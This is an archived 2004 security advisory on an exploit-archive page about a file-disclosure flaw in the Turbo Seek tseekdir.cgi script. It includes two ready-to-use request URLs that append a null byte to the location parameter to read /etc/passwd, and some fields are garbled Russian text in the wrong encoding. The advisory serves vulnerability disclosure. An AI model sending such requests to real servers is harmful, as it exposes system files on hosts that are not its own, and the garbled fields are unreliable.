adv17.txt

adv17.txt: Posted Sep 13, 2004; Authored by durito | Site lwb57.org; A vulnerability in Turbo Seek 1.x allows an attacker the ability to access the contents of any file in the file system.; tags | exploit; SHA-256 | fad5b7e11a59e7a95ea1a03df172d19dd0c7273b055c119e5e06dc2f9135f4e5; Download | Favorite | View

adv17.txt


+~~~| Advisory #17. Search Engine & Directory by Turbo Seek 

 Software:      Search Engine & Directory Powered by Turbo Seek    
 Vendor:        FocalMedia.Net https://www.focalmedia.net                            
 Vulnerability: âîçìîæíîñòü ÷òåíèÿ ôàéëîâ 
 Risk:          ñðåäíèé                                
 Date:          10'Sept 2004                                  
 
 discovered by durito -durito[at]mail[dot]ru-             
  HTTP:         www.lwb57.org     
  IRC:          irc.lwb57.org:6667  #lwb      

+~~~:| Details |: 

 Ñêðèïò tseekdir.cgi íå âûïîëíÿåò ïðîâåðêó íà "null-byte poison"

+~~~:| Exploit |:             

 www.victim.com/cgi-bin/cgi/tseekdir.cgi?location=/etc/passwd%00
 www.victim.com/cgi-bin/tseekdir.cgi?id=799&location=/etc/passwd%00



 
(c) 2004 copyright by LwB Security Team. all rights reserved

Top Authors In Last 30 Days

Red Hat 242 files
Ubuntu 52 files
Debian 22 files
LiquidWorm 15 files
Apple 9 files
Gentoo 8 files
Google Security Research 3 files
Alter Prime 3 files
Pierre Kim 2 files
Jann Horn 2 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,166)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,960)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,344)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,989)
UNIX (9,475)
UnixWare (188)
Windows (6,784)
Other

adv17.txt

adv17.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

adv17.txt

Share This

adv17.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems